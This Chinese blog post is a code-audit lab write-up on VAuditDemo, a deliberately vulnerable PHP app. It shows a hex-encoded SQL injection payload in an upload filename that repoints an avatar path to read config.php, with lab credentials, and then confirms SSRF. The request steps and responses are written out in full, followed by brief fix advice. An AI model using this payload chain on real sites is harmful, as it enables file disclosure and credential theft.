VAuditDemo-任意文件读取 (2)

repeater重放包,查看数据是否成功写入2,说明执行成功。

9 test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 2 2020-04-11 127.0.0.1

修改2为../../sys/config.php,查看数据库信息发现filename处只能输入文件名,不能带路径。

9 test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 ../uploads/u_1586583208_config.php 2020-04-11 127.0.0.1

对../sys/config.php进行十六进制编码,再次尝试,成功写入../sys/config.php。

filename="',user_avatar = 0x2F7379732F636F6E666967706870 WHERE user_name = 'test'#.png"(注意十六进制头部需加0x) // 结果 9 test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 ../sys/config.php 2020-04-11 127.0.0.1

获取头像操作是在登录时进行获取的,此时我们可以将抓到的登录包和获取头像的包修改一下session值,重放。 在获取头像的响应中即可看到config.php的源码。

HTTP/1.1 200 OK Date: Sat, 11 Apr 2020 06:03:34 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: image/jpeg Content-Length: 552 <?php // error_reporting(E_ALL); error_reporting(0); if (!file_exists($_SERVER["DOCUMENT_ROOT"].'/sys/install.lock')){ header("Location: /install/install.php"); exit; } include_once('../sys/lib.php'); $host="localhost"; $username="root"; $password="root"; $database="vauditdemo"; $conn = mysql_connect($host,$username,$password); mysql_query('set names utf8',$conn); mysql_select_db($database, $conn) or die(mysql_error()); if (!$conn) { die('Could not connect: ' . mysql_error()); exit; } session_start(); ?>

接下来测试一下是否存在ssrf漏洞。将转换为十六进制。重发登录包和获取头像包,能够获取百度的首页html,说明存在ssrf。

test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 2020-04-11 127.0.0.1 HTTP/1.1 200 OK Date: Sat, 11 Apr 2020 06:36:55 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: image/jpeg Content-Length: 14616 <!DOCTYPE html><!--STATUS OK--> <html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <link rel="dns-prefetch" href="//s1.bdstatic.com"/> <link rel="dns-prefetch" href="//t1.baidu.com"/> <link rel="dns-prefetch" href="//t2.baidu.com"/> <link rel="dns-prefetch" href="//t3.baidu.com"/> <link rel="dns-prefetch" href="//t10.baidu.com"/> <link rel="dns-prefetch" href="//t11.baidu.com"/> <link rel="dns-prefetch" href="//t12.baidu.com"/> <link rel="dns-prefetch" href="//b1.bdstatic.com"/> <title>百度一下,你就知道</title> <link href="http://s1.bdstatic.com/r/www/cache/static/home/css/index.css" rel="stylesheet" type="text/css" /> ......
漏洞修复

对$_FILE进行过滤

对filename中的特殊字符进行过滤。

审计思路总结

1.file_get_contents可以读取$_SESSION['avater']

2.$_SESSION['avater']通过$row['user_avater']获取

3.updateAvater.php中的头像是从数据库中获取

4.$avater通过$_FILE['upfile']['name']传入。

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zyzdzz.html